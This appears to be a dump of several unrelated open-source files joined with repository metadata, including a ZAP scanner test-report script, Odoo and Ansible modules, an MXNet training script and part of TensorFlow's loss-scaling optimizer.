"""Erases the entire current line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cols)
def erase_down (self): # <ESC>[0J -or- <ESC>[J
"""Erases the screen from the current line down to the bottom of the
screen."""
self.erase_end_of_line ()
self.fill_region (self.cur_r + 1, 1, self.rows, self.cols)
def erase_up (self): # <ESC>[1J
"""Erases the screen from the current line up to the top of the
screen."""
self.erase_start_of_line ()
self.fill_region (self.cur_r-1, 1, 1, self.cols)
def erase_screen (self): # <ESC>[2J
"""Erases the screen with the background color."""
self.fill ()
def set_tab (self): # <ESC>H
"""Sets a tab at the current position."""
pass
def clear_tab (self): # <ESC>[g
"""Clears tab at the current position."""
pass
def clear_all_tabs (self): # <ESC>[3g
"""Clears all tabs."""
pass
# Insert line Esc [ Pn L
# Delete line Esc [ Pn M
# Delete character Esc [ Pn P
# Scrolling region Esc [ Pn(top);Pn(bot) r
| apache-2.0 | -4,719,746,328,399,164,000 | 27.487374 | 101 | 0.571935 | false |
efdutra/zaproxy | python/scripts/watcher/watcher.py | 28 | 8154 | # Zed Attack Proxy (ZAP) and its related class files.
#
# ZAP is an HTTP/HTTPS proxy for assessing web application security.
#
# Copyright 2012 ZAP Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script tests ZAP against the Watcher test pages:
# http://www.nottrusted.com/watcher/
#
# To run this script:
# * Install the ZAP Python API:
# Use 'pip install python-owasp-zap' or
# download from https://github.com/zaproxy/zaproxy/wiki/Downloads
# * Start ZAP (as this is for testing purposes you might not want the
# 'standard' ZAP to be started)
# * Access http://www.nottrusted.com/watcher/ via your browser, proxying through ZAP
# * Run the Spider against http://www.nottrusted.com/watcher/
# * Run this script
# * Open the report.html file generated in your browser
#
from zap import ZAP
import datetime
# Change this if your version of ZAP is running on a different host and/or port:
zapUrl = 'http://127.0.0.1:8090'
# Dictionary of abbreviations to keep the output a bit shorter
abbrev = {
'Cookie set without HttpOnly flag' : 'HttpOnly',\
'Cookie set without secure flag' : 'InsecureCookie',\
'Content-Type header missing' : 'NoContentHeader',\
'Cross Site Request Forgery' : 'CSRF',\
'Cross Site Scripting' : 'XSS',\
'Cross-domain JavaScript source file inclusion' : 'CrossJS',\
'HTTP Parameter Override' : 'HttpOverride',\
'IE8\'s XSS protection filter not disabled' : 'IE8XSSfilter',\
'Incomplete or no cache-control and pragma HTTPHeader set' : 'CacheControl',\
'Information disclosure - database error messages' : 'InfoDb',\
'Information disclosure - debug error messages' : 'InfoDebug',\
'Information disclosure - sensitive informations in URL' : 'InfoUrl',\
'Information disclosure - suspicious comments' : 'InfoComments',\
'Password Autocomplete in browser' : 'Auto',\
'SQL Injection' : 'SQLi',\
'SQL Injection Fingerprinting' : 'SQLfp',\
'Weak HTTP authentication over an unsecured connection' : 'WeakAuth',\
'Weak Authentication Method' : 'WeakAuth',\
'X-Content-Type-Options header missing' : 'XContent',\
'X-Frame-Options header not set' : 'XFrame'}
# The rules to apply:
# Column 1: String to match against an alert URL
# Column 2: Alert abbreviation to match
# Column 3: pass or fail
#
rules = [ \
['Check.Pasv.Cookie.HttpOnly.php', 'HttpOnly', 'pass'], \
['Check.Pasv.Cookie.Secure.php', 'InsecureCookie', 'pass'],\
['Check.Pasv.CrossDomain.ScriptReference.php', 'CrossJS', 'pass'], \
['Check.Pasv.Header.ContentTypeMissing.php', 'XContent', 'pass'], \
['Check.Pasv.Header.FrameOptions.php', 'XFrame', 'pass'],\
['Check.Pasv.Header.IeXssProtection.php', 'IE8XSSfilter', 'pass'], \
['Check.Pasv.Header.CacheControl.php', 'CacheControl', 'pass'], \
['Check.Pasv.Header.MimeSniff.php', 'NoContentHeader', 'pass'],\
['Check.Pasv.Header.WeakAuth.php', 'WeakAuth', 'pass'], \
['Check.Pasv.InformationDisclosure.Comments.php', 'InfoComments', 'pass'], \
['Check.Pasv.InformationDisclosure.DatabaseErrors.php', 'InfoDb', 'pass'], \
['Check.Pasv.InformationDisclosure.DebugErrors.php', 'InfoDebug', 'pass'], \
['Check.Pasv.InformationDisclosure.InUrl.php', 'InfoUrl', 'pass'], \
['watcher/Check.Pasv.Cookie.Secure.php', 'InsecureCookie', 'pass'],\
]
zap = ZAP(proxies={'http': zapUrl, 'https': zapUrl})
alerts = zap.alerts
uniqueUrls = set([])
# alertsPerUrl is a dictionary mapping a urlSummary to a dictionary of result type to a set of alert short names ;)
alertsPerUrl = {}
plugins = set([])
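# The loop below maps each alert onto its Watcher test page (the fifth element of the URL path)
# and classifies its abbreviated name as pass/fail/other according to the rules table above.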
for alert in alerts:
url = alert.get('url')
# Grab the url before any '?'
url = url.split('?')[0]
#print 'URL: ' + url
urlEl = url.split('/')
if (len(urlEl) > 4):
if (urlEl[4][:5] != 'Check'):
continue
urlSummary = urlEl[4]
short = abbrev.get(alert.get('alert'))
if (short is None):
print 'No abbreviation for: ' + alert.get('alert')
short = alert.get('alert')
aDict = alertsPerUrl.get(urlSummary, {'pass' : set([]), 'fail' : set([]), 'other' : set([])})
added = False
for rule in rules:
if (rule[0] in urlSummary and rule[1] == short):
aDict[rule[2]].add(short)
added = True
break
if (not added):
aDict['other'].add(short)
alertsPerUrl[urlSummary] = aDict
plugins.add(alert.get('alert'))
uniqueUrls.add(url)
#for key, value in alertsPerUrl.iteritems():
# print key, value
print "Alerts found"
print "------------"
for plugin in plugins:
print plugin
# Generate report file
reportFile = open('report.html', 'w')
reportFile.write("<html><head><title>ZAP Wavsep Report</title></head><body>\n")
reportFile.write("<h1><img src=\"http://zaproxy.googlecode.com/svn/trunk/src/resource/zap64x64.png\" align=\"middle\">OWASP ZAP watcher results</h1>\n")
reportFile.write("Generated: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M") + "\n")
groupResults = []
thisGroup = ['', 0, 0]
totalPass = 0
totalFail = 0
total = 0
for key, value in sorted(alertsPerUrl.iteritems()):
if (len(value.get('pass')) > 0):
totalPass += 1
else:
totalFail += 1
# Output the summary
reportFile.write("<h3>Total Score</h3>\n")
reportFile.write("<font style=\"BACKGROUND-COLOR: GREEN\">")
for i in range (totalPass):
reportFile.write(" ")
reportFile.write("</font>")
reportFile.write("<font style=\"BACKGROUND-COLOR: RED\">")
for i in range (totalFail):
reportFile.write(" ")
reportFile.write("</font>")
total = 100 * totalPass / (totalPass + totalFail)
reportFile.write(str(total) + "%<br/>")
reportFile.write("Pass: " + str(totalPass) + "<br/>")
reportFile.write("Fail: " + str(totalFail) + "<br/>")
reportFile.write("Total: " + str(totalPass + totalFail) + "<br/>")
# Output the detail table
reportFile.write("<h3>Detailed Results</h3>\n")
reportFile.write("<table border=\"1\">\n")
reportFile.write("<tr><th>Page</th><th>Result</th><th>Pass</th><th>Fail</th><th>Other</th>\n")
for key, value in sorted(alertsPerUrl.iteritems()):
reportFile.write("<tr>")
reportFile.write("<td>" + key + "</td>")
reportFile.write("<td>")
if (len(value.get('pass')) > 0):
reportFile.write("<font style=\"BACKGROUND-COLOR: GREEN\"> PASS </font>")
elif (len(value.get('fail')) > 0):
reportFile.write("<font style=\"BACKGROUND-COLOR: RED\"> FAIL </font>")
elif ('FalsePositive' in key):
reportFile.write("<font style=\"BACKGROUND-COLOR: GREEN\"> PASS </font>")
else:
reportFile.write("<font style=\"BACKGROUND-COLOR: RED\"> FAIL </font>")
reportFile.write("</td>")
reportFile.write("<td>" + " ".join(value.get('pass')) + " </td>")
reportFile.write("<td>" + " ".join(value.get('fail')) + " </td>")
reportFile.write("<td>" + " ".join(value.get('other')) + " </td>")
reportFile.write("</tr>\n")
reportFile.write("</table><br/>\n")
reportFile.write("<h3>Alerts Key</h3>\n")
reportFile.write("<table border=\"1\">\n")
reportFile.write("<tr><th>Alert</th><th>Description</th>\n")
#for key, value in abbrev.items():
for (k, v) in sorted(abbrev.items(), key=lambda (k,v): v):
reportFile.write("<tr>")
reportFile.write("<td>" + v + "</td>")
reportFile.write("<td>" + k + "</td>")
reportFile.write("</tr>\n")
reportFile.write("</table><br/>\n")
reportFile.write("</body></html>\n")
reportFile.close()
#for key, value in sorted(alertsPerUrl.iteritems()):
# print "%s: %s" % (key, value)
#print ''
print ''
print 'Got ' + str(len(alerts)) + ' alerts'
print 'Got ' + str(len(uniqueUrls)) + ' unique urls'
| apache-2.0 | -5,172,537,633,220,105,000 | 36.28169 | 152 | 0.659676 | false |
lujinda/gale | sample/login/run.py | 1 | 1105 | #!/usr/bin/env python
#coding:utf-8
# Author : tuxpy
# Email : [email protected]
# Last modified : 2015-06-09 15:20:13
# Filename : test.py
# Description :
from gale.web import app_run, router, RequestHandler
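# Minimal session-based login sample: get_current_user() reads the username from the session,
# the /login POST handler stores it and redirects back via the 'callback' query argument, and
# the index handler requires a logged-in user (should_login=True).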
class BaseHandler(RequestHandler):
def get_current_user(self):
return self.session.get('username')
@router(url = '/login', is_login = True, base_handler = BaseHandler)
def login(self):
self.render('login.html')
@router(url = '/login', method = 'POST', base_handler = BaseHandler)
def login_post(self):
username = self.get_argument('username', '')
if username:
self.session['username'] = username
self.session.save()
callback_url = self.get_query_argument('callback', '/')
self.redirect(callback_url)
@router(url = '/logout', method='GET', base_handler = BaseHandler)
def logout(self):
self.session.pop('username', None)
self.session.save()
self.redirect('/')
@router(url = '/', base_handler = BaseHandler, should_login = True)
def index(self):
self.push('hi ' + self.current_user)
app_run(__file__)
| mit | -7,656,263,590,322,026,000 | 27.333333 | 68 | 0.651584 | false |
jiajiechen/mxnet | example/kaggle-ndsb1/train_dsb.py | 41 | 4039 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import find_mxnet
import mxnet as mx
import logging
import argparse
import train_model
import time
# don't use -n and -s, which are reserved for the distributed training
parser = argparse.ArgumentParser(description='train an image classifier on Kaggle Data Science Bowl 1')
parser.add_argument('--network', type=str, default='dsb',
help = 'the cnn to use')
parser.add_argument('--data-dir', type=str, default="data48/",
help='the input data directory')
parser.add_argument('--save-model-prefix', type=str,default= "./models/sample_net",
help='the prefix of the model to load/save')
parser.add_argument('--lr', type=float, default=.01,
help='the initial learning rate')
parser.add_argument('--lr-factor', type=float, default=1,
help='times the lr with a factor for every lr-factor-epoch epoch')
parser.add_argument('--lr-factor-epoch', type=float, default=15,
help='the number of epoch to factor the lr, could be .5')
parser.add_argument('--clip-gradient', type=float, default=5.,
help='clip min/max gradient to prevent extreme value')
parser.add_argument('--num-epochs', type=int, default=100,
help='the number of training epochs')
parser.add_argument('--load-epoch', type=int,
help="load the model on an epoch using the model-prefix")
parser.add_argument('--batch-size', type=int, default=64,
help='the batch size')
parser.add_argument('--gpus', type=str,
help='the gpus will be used, e.g "0,1,2,3"')
parser.add_argument('--kv-store', type=str, default='local',
help='the kvstore type')
parser.add_argument('--num-examples', type=int, default=20000,
help='the number of training examples')
parser.add_argument('--num-classes', type=int, default=121,
help='the number of classes')
parser.add_argument('--log-file', type=str,
help='the name of log file')
parser.add_argument('--log-dir', type=str, default="/tmp/",
help='directory of the log file')
args = parser.parse_args()
# network
import importlib
net = importlib.import_module('symbol_' + args.network).get_symbol(args.num_classes)
# data
def get_iterator(args, kv):
data_shape = (3, 36, 36)
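# Both iterators read pre-packed RecordIO files; pixel values are centered on 128 and scaled by
# 0.0078125 (1/128). Random crop/mirror/aspect-ratio augmentation is applied to the training set only.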
# train data iterator
train = mx.io.ImageRecordIter(
path_imgrec = args.data_dir + "tr.rec",
mean_r = 128,
mean_g = 128,
mean_b = 128,
scale = 0.0078125,
max_aspect_ratio = 0.35,
data_shape = data_shape,
batch_size = args.batch_size,
rand_crop = True,
rand_mirror = True,
)
# validate data iterator
val = mx.io.ImageRecordIter(
path_imgrec = args.data_dir + "va.rec",
mean_r = 128,
mean_b = 128,
mean_g = 128,
scale = 0.0078125,
rand_crop = False,
rand_mirror = False,
data_shape = data_shape,
batch_size = args.batch_size)
return (train, val)
# train
tic=time.time()
train_model.fit(args, net, get_iterator)
print "time elapsed to train model", time.time()-tic
| apache-2.0 | 1,754,920,422,216,337,200 | 38.990099 | 102 | 0.635553 | false |
levkar/odoo | addons/website_sale/models/res_config.py | 20 | 7095 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, models, fields
class WebsiteConfigSettings(models.TransientModel):
_inherit = 'website.config.settings'
def _default_order_mail_template(self):
if self.env['ir.module.module'].search([('name', '=', 'website_quote')]).state in ('installed', 'to upgrade'):
return self.env.ref('website_quote.confirmation_mail').id
else:
return self.env.ref('sale.email_template_edi_sale').id
salesperson_id = fields.Many2one('res.users', related='website_id.salesperson_id', string='Salesperson')
salesteam_id = fields.Many2one('crm.team', related='website_id.salesteam_id', string='Sales Team')
module_delivery = fields.Boolean("Manage shipping internally")
module_website_sale_delivery = fields.Boolean("Add Delivery Costs to Online Sales")
# field used to have a nice radio in the form view, summarizing the 2 fields above
sale_delivery_settings = fields.Selection([
('none', 'No shipping management on website'),
('internal', "Delivery methods are only used internally: the customer doesn't pay for shipping costs"),
('website', "Delivery methods are selectable on the website: the customer pays for shipping costs"),
], string="Shipping Management")
module_delivery_dhl = fields.Boolean("DHL integration")
module_delivery_fedex = fields.Boolean("Fedex integration")
module_delivery_temando = fields.Boolean("Temando integration")
module_delivery_ups = fields.Boolean("UPS integration")
module_delivery_usps = fields.Boolean("USPS integration")
module_sale_ebay = fields.Boolean("eBay connector")
group_website_multiimage = fields.Selection([
(0, 'One image per product'),
(1, 'Several images per product')
], string='Multi Images', implied_group='website_sale.group_website_multi_image', group='base.group_portal,base.group_user,base.group_public')
module_website_sale_options = fields.Selection([
(0, 'One-step "add to cart"'),
(1, 'Suggest optional products when adding to cart (e.g. for a computer: warranty, software, etc.)')
], "Optional Products", help='Installs *e-Commerce Optional Products*')
module_portal = fields.Boolean("Activate the customer portal", help="""Give your customers access to their documents.""")
# the next 2 fields represent sale_pricelist_setting from sale.config.settings; they are split here for the form view to improve usability
sale_pricelist_setting_split_1 = fields.Selection([
(0, 'A single sales price per product'),
(1, 'Several prices selectable through a drop-down list or applied automatically via Geo-IP'),
], default=0, string="Pricing Strategy")
sale_pricelist_setting_split_2 = fields.Selection([
(0, 'Specific prices per customer segment, currency, etc.'),
(1, 'Advanced pricing based on formulas (discounts, margins, rounding)')
], default=0, string="Sales Price",
help='Specific prices per customer segment, currency, etc.: new pricing table available in product detail form (Sales tab).\n'
'Advanced pricing based on formulas (discounts, margins, rounding): apply price rules from a new *Pricelists* menu in Configuration.')
group_sale_pricelist = fields.Boolean("Use pricelists to adapt your price per customers",
implied_group='product.group_sale_pricelist',
help="""Allows to manage different prices based on rules per category of customers.
Example: 10% for retailers, promotion of 5 EUR on this product, etc.""")
group_pricelist_item = fields.Boolean("Show pricelists to customers",
implied_group='product.group_pricelist_item')
group_product_pricelist = fields.Boolean("Show pricelists On Products",
implied_group='product.group_product_pricelist')
order_mail_template = fields.Many2one('mail.template', string='Order Confirmation Email', readonly=True, default=_default_order_mail_template, help="Email sent to customer at the end of the checkout process")
@api.model
def get_default_sale_delivery_settings(self, fields):
sale_delivery_settings = 'none'
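# Map the installed delivery modules onto the radio value: 'delivery' alone -> 'internal',
# 'website_sale_delivery' as well -> 'website', neither -> 'none'.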
if self.env['ir.module.module'].search([('name', '=', 'delivery')], limit=1).state in ('installed', 'to install', 'to upgrade'):
sale_delivery_settings = 'internal'
if self.env['ir.module.module'].search([('name', '=', 'website_sale_delivery')], limit=1).state in ('installed', 'to install', 'to upgrade'):
sale_delivery_settings = 'website'
return {'sale_delivery_settings': sale_delivery_settings}
@api.model
def get_default_sale_pricelist_setting(self, fields):
return {'sale_pricelist_setting_split_1': 0 if self.env['ir.values'].get_defaults_dict('sale.config.settings').get('sale_pricelist_setting', 'fixed') == 'fixed' else 1,
'sale_pricelist_setting_split_2': 0 if self.env['ir.values'].get_defaults_dict('sale.config.settings').get('sale_pricelist_setting', 'fixed') != 'formula' else 1}
@api.model
def set_sale_pricelist_settings(self):
sale_pricelist_setting = 'formula'
if self.sale_pricelist_setting_split_1 == 0:
sale_pricelist_setting = 'fixed'
elif self.sale_pricelist_setting_split_2 == 0:
sale_pricelist_setting = 'percentage'
return self.env['ir.values'].sudo().set_default(
'sale.config.settings', 'sale_pricelist_setting', sale_pricelist_setting)
@api.onchange('sale_delivery_settings')
def _onchange_sale_delivery_settings(self):
if self.sale_delivery_settings == 'none':
self.update({
'module_delivery': False,
'module_website_sale_delivery': False,
})
elif self.sale_delivery_settings == 'internal':
self.update({
'module_delivery': True,
'module_website_sale_delivery': False,
})
else:
self.update({
'module_delivery': True,
'module_website_sale_delivery': True,
})
@api.onchange('sale_pricelist_setting_split_1', 'sale_pricelist_setting_split_2')
def _onchange_sale_pricelist_setting(self):
if self.sale_pricelist_setting_split_1 == 0:
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': False,
'group_pricelist_item': False,
})
else:
if self.sale_pricelist_setting_split_2 == 0:
self.update({
'group_product_pricelist': True,
'group_sale_pricelist': True,
'group_pricelist_item': False,
})
else:
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': True,
'group_pricelist_item': True,
})
| agpl-3.0 | 6,818,163,870,383,461,000 | 56.217742 | 212 | 0.643693 | false |
Jorge-Rodriguez/ansible | lib/ansible/modules/cloud/google/gce_labels.py | 104 | 12673 | #!/usr/bin/python
# Copyright 2017 Google Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gce_labels
version_added: '2.4'
short_description: Create, Update or Destroy GCE Labels.
description:
- Create, Update or Destroy GCE Labels on instances, disks, snapshots, etc.
When specifying the GCE resource, users may specify the full URL for
the resource (its 'self_link'), or the individual parameters of the
resource (type, location, name). Examples for the two options can be
seen in the documentation.
See U(https://cloud.google.com/compute/docs/label-or-tag-resources) for
more information about GCE Labels. Labels are gradually being added to
more GCE resources, so this module will need to be updated as new
resources are added to the GCE (v1) API.
requirements:
- 'python >= 2.6'
- 'google-api-python-client >= 1.6.2'
- 'google-auth >= 1.0.0'
- 'google-auth-httplib2 >= 0.0.2'
notes:
- Labels support resources such as instances, disks, images, etc. See
U(https://cloud.google.com/compute/docs/labeling-resources) for the list
of resources available in the GCE v1 API (not alpha or beta).
author:
- 'Eric Johnson (@erjohnso) <[email protected]>'
options:
labels:
description:
- A list of labels (key/value pairs) to add or remove for the resource.
required: false
resource_url:
description:
- The 'self_link' for the resource (instance, disk, snapshot, etc)
required: false
resource_type:
description:
- The type of resource (instances, disks, snapshots, images)
required: false
resource_location:
description:
- The location of resource (global, us-central1-f, etc.)
required: false
resource_name:
description:
- The name of resource.
required: false
'''
EXAMPLES = '''
- name: Add labels on an existing instance (using resource_url)
gce_labels:
service_account_email: "{{ service_account_email }}"
credentials_file: "{{ credentials_file }}"
project_id: "{{ project_id }}"
labels:
webserver-frontend: homepage
environment: test
experiment-name: kennedy
resource_url: https://www.googleapis.com/compute/beta/projects/myproject/zones/us-central1-f/instances/example-instance
state: present
- name: Add labels on an image (using resource params)
gce_labels:
service_account_email: "{{ service_account_email }}"
credentials_file: "{{ credentials_file }}"
project_id: "{{ project_id }}"
labels:
webserver-frontend: homepage
environment: test
experiment-name: kennedy
resource_type: images
resource_location: global
resource_name: my-custom-image
state: present
- name: Remove specified labels from the GCE instance
gce_labels:
service_account_email: "{{ service_account_email }}"
credentials_file: "{{ credentials_file }}"
project_id: "{{ project_id }}"
labels:
environment: prod
experiment-name: kennedy
resource_url: https://www.googleapis.com/compute/beta/projects/myproject/zones/us-central1-f/instances/example-instance
state: absent
'''
RETURN = '''
labels:
description: List of labels that exist on the resource.
returned: Always.
type: dict
sample: [ { 'webserver-frontend': 'homepage', 'environment': 'test', 'environment-name': 'kennedy' } ]
resource_url:
description: The 'self_link' of the GCE resource.
returned: Always.
type: str
sample: 'https://www.googleapis.com/compute/beta/projects/myproject/zones/us-central1-f/instances/example-instance'
resource_type:
description: The type of the GCE resource.
returned: Always.
type: str
sample: instances
resource_location:
description: The location of the GCE resource.
returned: Always.
type: str
sample: us-central1-f
resource_name:
description: The name of the GCE resource.
returned: Always.
type: str
sample: my-happy-little-instance
state:
description: state of the labels
returned: Always.
type: str
sample: present
'''
try:
from ast import literal_eval
HAS_PYTHON26 = True
except ImportError:
HAS_PYTHON26 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.gcp import check_params, get_google_api_client, GCPUtils
UA_PRODUCT = 'ansible-gce_labels'
UA_VERSION = '0.0.1'
GCE_API_VERSION = 'v1'
# TODO(all): As Labels are added to more GCE resources, this list will need to
# be updated (along with some code changes below). The list can *only* include
# resources from the 'v1' GCE API and will *not* work with 'beta' or 'alpha'.
KNOWN_RESOURCES = ['instances', 'disks', 'snapshots', 'images']
def _fetch_resource(client, module):
params = module.params
if params['resource_url']:
if not params['resource_url'].startswith('https://www.googleapis.com/compute'):
module.fail_json(
msg='Invalid self_link url: %s' % params['resource_url'])
else:
parts = params['resource_url'].split('/')[8:]
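# A zonal self_link ends in .../zones/<location>/<type>/<name>, so elements 8.. give
# (location, type, name); a global resource yields only (type, name) and defaults to 'global'.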
if len(parts) == 2:
resource_type, resource_name = parts
resource_location = 'global'
else:
resource_location, resource_type, resource_name = parts
else:
if not params['resource_type'] or not params['resource_location'] \
or not params['resource_name']:
module.fail_json(msg='Missing required resource params.')
resource_type = params['resource_type'].lower()
resource_name = params['resource_name'].lower()
resource_location = params['resource_location'].lower()
if resource_type not in KNOWN_RESOURCES:
module.fail_json(msg='Unsupported resource_type: %s' % resource_type)
# TODO(all): See the comment above for KNOWN_RESOURCES. As labels are
# added to the v1 GCE API for more resources, some minor code work will
# need to be added here.
if resource_type == 'instances':
resource = client.instances().get(project=params['project_id'],
zone=resource_location,
instance=resource_name).execute()
elif resource_type == 'disks':
resource = client.disks().get(project=params['project_id'],
zone=resource_location,
disk=resource_name).execute()
elif resource_type == 'snapshots':
resource = client.snapshots().get(project=params['project_id'],
snapshot=resource_name).execute()
elif resource_type == 'images':
resource = client.images().get(project=params['project_id'],
image=resource_name).execute()
else:
module.fail_json(msg='Unsupported resource type: %s' % resource_type)
return resource.get('labelFingerprint', ''), {
'resource_name': resource.get('name'),
'resource_url': resource.get('selfLink'),
'resource_type': resource_type,
'resource_location': resource_location,
'labels': resource.get('labels', {})
}
def _set_labels(client, new_labels, module, ri, fingerprint):
params = module.params
result = err = None
labels = {
'labels': new_labels,
'labelFingerprint': fingerprint
}
# TODO(all): See the comment above for KNOWN_RESOURCES. As labels are
# added to the v1 GCE API for more resources, some minor code work will
# need to be added here.
if ri['resource_type'] == 'instances':
req = client.instances().setLabels(project=params['project_id'],
instance=ri['resource_name'],
zone=ri['resource_location'],
body=labels)
elif ri['resource_type'] == 'disks':
req = client.disks().setLabels(project=params['project_id'],
zone=ri['resource_location'],
resource=ri['resource_name'],
body=labels)
elif ri['resource_type'] == 'snapshots':
req = client.snapshots().setLabels(project=params['project_id'],
resource=ri['resource_name'],
body=labels)
elif ri['resource_type'] == 'images':
req = client.images().setLabels(project=params['project_id'],
resource=ri['resource_name'],
body=labels)
else:
module.fail_json(msg='Unsupported resource type: %s' % ri['resource_type'])
# TODO(erjohnso): Once Labels goes GA, we'll be able to use the GCPUtils
# method to poll for the async request/operation to complete before
# returning. However, during 'beta', we are in an odd state where
# API requests must be sent to the 'compute/beta' API, but the python
# client library only allows for *Operations.get() requests to be
# sent to 'compute/v1' API. The response operation is in the 'beta'
# API-scope, but the client library cannot find the operation (404).
# result = GCPUtils.execute_api_client_req(req, client=client, raw=False)
# return result, err
result = req.execute()
return True, err
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(choices=['absent', 'present'], default='present'),
service_account_email=dict(),
service_account_permissions=dict(type='list'),
pem_file=dict(),
credentials_file=dict(),
labels=dict(required=False, type='dict', default={}),
resource_url=dict(required=False, type='str'),
resource_name=dict(required=False, type='str'),
resource_location=dict(required=False, type='str'),
resource_type=dict(required=False, type='str'),
project_id=dict()
),
required_together=[
['resource_name', 'resource_location', 'resource_type']
],
mutually_exclusive=[
['resource_url', 'resource_name'],
['resource_url', 'resource_location'],
['resource_url', 'resource_type']
]
)
if not HAS_PYTHON26:
module.fail_json(
msg="GCE module requires python's 'ast' module, python v2.6+")
client, cparams = get_google_api_client(module, 'compute',
user_agent_product=UA_PRODUCT,
user_agent_version=UA_VERSION,
api_version=GCE_API_VERSION)
# Get current resource info including labelFingerprint
fingerprint, resource_info = _fetch_resource(client, module)
new_labels = resource_info['labels'].copy()
update_needed = False
if module.params['state'] == 'absent':
for k, v in module.params['labels'].items():
if k in new_labels:
if new_labels[k] == v:
update_needed = True
new_labels.pop(k, None)
else:
module.fail_json(msg="Could not remove unmatched label pair '%s':'%s'" % (k, v))
else:
for k, v in module.params['labels'].items():
if k not in new_labels:
update_needed = True
new_labels[k] = v
changed = False
json_output = {'state': module.params['state']}
if update_needed:
changed, err = _set_labels(client, new_labels, module, resource_info,
fingerprint)
json_output['changed'] = changed
# TODO(erjohnso): probably want to re-fetch the resource to return the
# new labelFingerprint, check that desired labels match updated labels.
# BUT! Will need to wait for setLabels() to hit v1 API so we can use the
# GCPUtils feature to poll for the operation to be complete. For now,
# we'll just update the output with what we have from the original
# state of the resource.
json_output.update(resource_info)
json_output.update(module.params)
module.exit_json(**json_output)
if __name__ == '__main__':
main()
| gpl-3.0 | -2,670,281,631,069,084,700 | 38.114198 | 123 | 0.609011 | false |
alshedivat/tensorflow | tensorflow/contrib/mixed_precision/python/loss_scale_optimizer.py | 20 | 6862 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Loss scaling optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.training import optimizer
class LossScaleOptimizer(optimizer.Optimizer):
# TODO(jamesqin): move mixed precision training explanation to __init__
# docstring.
"""An optimizer that applies loss scaling in backprop.
This class is useful for "mixed precision training" on GPUs (or other
potential accelerators), an approach to improve compute throughput without
compromising model quality.
The canonical way to perform mixed precision training is the following:
* Model variables are kept in high precision (e.g. float32).
* Computations are done in lower precision (e.g. float16), which enjoys
    performance speedup by virtue of hardware support. Variables are cast to
    lower precision before they're used.
  * Final gradients are cast back to the high precision dtype, then used to update
variables.
  The side effect of performing computation in lower precision is that it comes
  with a smaller numerical range. During backpropagation, small gradients might
  underflow in the reduced numerical range, causing a model to converge at a
  suboptimal level.
To prevent underflow, this optimizer multiplies the loss by a factor before
backprop starts. Consequently, the gradients are linearly scaled up by the
  same factor, thus not falling into the underflow zone. After that, to preserve
  the correctness of backprop, the gradients are down-scaled by the same factor,
  cast to the (higher) variable precision, then applied to the variables.
See [Nvidia's manual on mixed precision training](
https://docs.nvidia.com/deeplearning/sdk/mixed-precision-training/index.html)
for more details.
  To use the loss scale optimizer, one only needs to choose a loss scale
  strategy and wrap a regular optimizer. See examples below.
```
loss = loss_fn()
opt = tf.AdamOptimizer(learning_rate=...)
# Choose a loss scale manager which decides how to pick the right loss scale
# throughout the training process.
loss_scale_manager = tf.contrib.mixed_precision.FixedLossScaleManager(5000)
# Wraps the original optimizer in a LossScaleOptimizer.
loss_scale_optimizer =
tf.contrib.mixed_precision.LossScaleOptimizer(opt, loss_scale_manager)
# Call minimize() on the loss scale optimizer.
train_op = loss_scale_optimizer.minimize(loss)
```
  If gradient clipping is applied, one can call
`optimizer.compute_gradients()` and `optimizer.apply_gradients()`
separately.
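  For example, a minimal sketch of combining this optimizer with custom
  gradient clipping (the clipping op and the clip norm of 5.0 below are
  illustrative choices, not requirements):
  ```
  grads_and_vars = loss_scale_optimizer.compute_gradients(loss)
  grads, variables = zip(*grads_and_vars)
  clipped_grads, _ = tf.clip_by_global_norm(grads, clip_norm=5.0)
  train_op = loss_scale_optimizer.apply_gradients(list(zip(clipped_grads, variables)))
  ```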
  Note that the following way of using LossScaleOptimizer is not intended. Always
use `loss_scale_optimizer.compute_gradients()` to compute gradients instead of
`tf.gradients()` if doing mixed precision training.
```
# The following is a wrong way to use LossScaleOptimizer along with
# tf.gradients().
# Always use loss_scale_optimizer.compute_gradients() to compute grads, or
# loss scale is not correctly applied.
grads = tf.gradients(loss, ...)
# Do some custom grad clipping.
grads = clip_grads(grads, ...)
loss_scale_optimizer.apply(grads_and_vars)
```
"""
